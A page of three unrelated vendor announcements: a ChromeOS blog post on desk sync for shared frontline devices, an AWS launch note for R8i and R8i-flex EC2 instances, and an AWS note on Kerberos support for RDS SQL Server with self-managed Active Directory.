For many workers, the frequent need to switch between devices can become cumbersome and disruptive. Otherwise simple tasks like logging in, reopening applications, and re-establishing your workspace end up consuming valuable time when done many times throughout the day. To address this challenge, we’re happy to introduce ChromeOS desk sync. This feature allows users to pick up right where they left off, moving from one ChromeOS device to another and seamlessly resuming their work. All open windows, tabs, applications, and user profile settings, along with authentication into different web services, are automatically transferred across devices.
Supporting frontline workers across industries
Across any industry, but especially frontline use cases like retail, hospitality, healthcare, and manufacturing, desk sync is a practical addition to support worker productivity.
In retail and hospitality, desk sync helps streamline operations during shift changes and improve customer interactions. Associates can pick up a new device at the start of their shift and immediately access their work, whether for inventory management, team communication, sales, and more, to better facilitate shift changes. Front desk staff can immediately access guest reservations, check-in systems, and service requests through any available device at the reception desk and continue right where they left off, making guest experiences smoother as well. This instant access allows employees to focus on providing a more consistent service, reducing wait times and improving customer experiences in the process. Even more, new employees may find it easier to adapt to shared device environments, as their familiar workspace can follow them and reduce setup times across devices.
Take a look at Village Hotel Club, who uses desk sync to share devices between hotel employees. At every hotel’s leisure center, two Chromebooks are available to share, which allows employees to take a ChromeOS device with them as they walk prospective members through their facilities, and then complete applications directly from that same device. This means employees can count on a reliable application experience across devices, without any disruptions to their workflows that could potentially impact customer service.
ChromeOS has revolutionized the way we work and revolutionized my role as an IT manager keeping data, people, and devices safe. It has also improved collaboration to the point that I couldn’t imagine how we could work effectively without them.
Dan Morley
Head of IT Infrastructure and Service Delivery, Village Hotels
In healthcare environments, desk sync optimizes essential tasks and enhances data consistency. Healthcare professionals can effortlessly move between patient rooms, nurse stations, or any other departments where devices can’t be moved around, accessing electronic health records, diagnostic tools, and communication platforms. Having access to consistent experiences to work across also helps support data privacy by reducing opportunities for vulnerabilities, human error, and data management issues. Overall, desk sync allows healthcare staff to spend less time worrying about login procedures and system navigation, and more time on direct patient care and critical tasks.
Within manufacturing use cases, desk sync contributes to a more continuous production flow and helps support team hand-offs. Manufacturing line workers and supervisors alike can easily move between workstations, accessing real-time data, quality control applications, and dashboards without significant delays. For shift changes, teams can more easily get up and running with desk sync, reducing disruptions in operations between shifts. Ultimately, reduced time spent on device setup will lead to more efficient time spent on the production floor and better operational efficiency as a result.
Future proof your frontline
ChromeOS desk sync is a powerful tool designed to meet the needs of modern work environments. By making it easier to transition between devices, it greatly reduces downtime and disruptions commonly associated with device switching. Whether in retail environments, hospitality, healthcare, or many other industries, desk sync provides consistency across devices, and empowers employees to focus more on their productivity and delivering exceptional customer experiences. If you’d like to get started with ChromeOS desk sync today, you can view our help center page to begin your configuration.
Interested in learning more about how ChromeOS can support shared device use cases? Visit our website.
AWS is announcing the general availability of new memory-optimized Amazon EC2 R8i and R8i-flex instances. These instances are powered by custom Intel Xeon 6 processors, available only on AWS, delivering the highest performance and fastest memory bandwidth among comparable Intel processors in the cloud. The R8i and R8i-flex instances offer up to 15% better price-performance, and 2.5x more memory bandwidth compared to previous generation Intel-based instances. They deliver 20% better performance than R7i instances, with even higher gains for specific workloads. They are up to 30% faster for PostgreSQL databases, up to 60% faster for NGINX web applications, and up to 40% faster for AI deep learning recommendation models compared to R7i.
R8i-flex, our first memory-optimized Flex instances, are the easiest way to get price performance benefits for a majority of memory-intensive workloads. They offer the most common sizes, from large to 16xlarge, and are a great first choice for applications that don’t fully utilize all compute resources.
R8i instances are a great choice for all memory-intensive workloads, especially for workloads that need the largest instance sizes or continuous high CPU usage. R8i instances offer 13 sizes including 2 bare metal and the new 96xlarge size for the largest applications. R8i instances are SAP-certified and deliver 142,100 aSAPS, the highest among all comparable machines in on-premises and cloud environments, delivering exceptional performance for mission-critical SAP workloads.
R8i and R8i-flex instances are available in the following AWS Regions: US East (N. Virginia), US East (Ohio), US West (Oregon), and Europe (Spain).
To get started, sign in to the AWS Management Console. Customers can purchase these instances via Savings Plans, On-Demand instances, and Spot instances. For more information about the new R8i and R8i-flex instances visit the AWS News blog.
Amazon Relational Database Service (Amazon RDS) for SQL Server now supports Kerberos authentication with self-managed Microsoft Active Directory (AD). With this launch, your applications can use Kerberos authentication to connect to your Amazon RDS for SQL Server instances joined to self-managed AD.
Previously, customers integrating Amazon RDS for SQL Server with Microsoft Active Directory had to use AWS Managed AD for Kerberos authentication. Now, customers can setup Kerberos authentication when integrating Amazon RDS for SQL Server with Microsoft AD without having to use AWS Managed AD. For customers that are migrating on-premises SQL Server databases to Amazon RDS for SQL Server, this feature simplifies migration by removing the requirement to adopt Amazon Managed AD to use Kerberos authentication. Customers who use Amazon RDS for SQL Server with AWS Managed AD can continue to use their existing integration.
To join your Amazon RDS for SQL Server instance to a self-managed AD and setup Kerberos authentication, refer to the Amazon RDS for SQL Server User Guide. This feature is available in all AWS Commercial and AWS GovCloud (US) Regions.